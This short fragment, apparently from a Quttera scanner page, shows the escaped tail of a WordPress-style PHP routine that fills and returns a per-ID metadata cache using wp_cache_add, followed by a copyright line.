\n\n\tforeach ( \$ids as \$id ) {
\n\t\tif ( ! isset(\$cache[\$id]) )\n\t\t\t\$cache[\$id] = array();
\n\t\twp_cache_add( \$id, \$cache[\$id], \$cache_key );
\n\t
}
\n\n\treturn \$cache;
\n
}
\n";
}
echo "\n \n";
© 2023 Quttera Ltd. All rights reserved.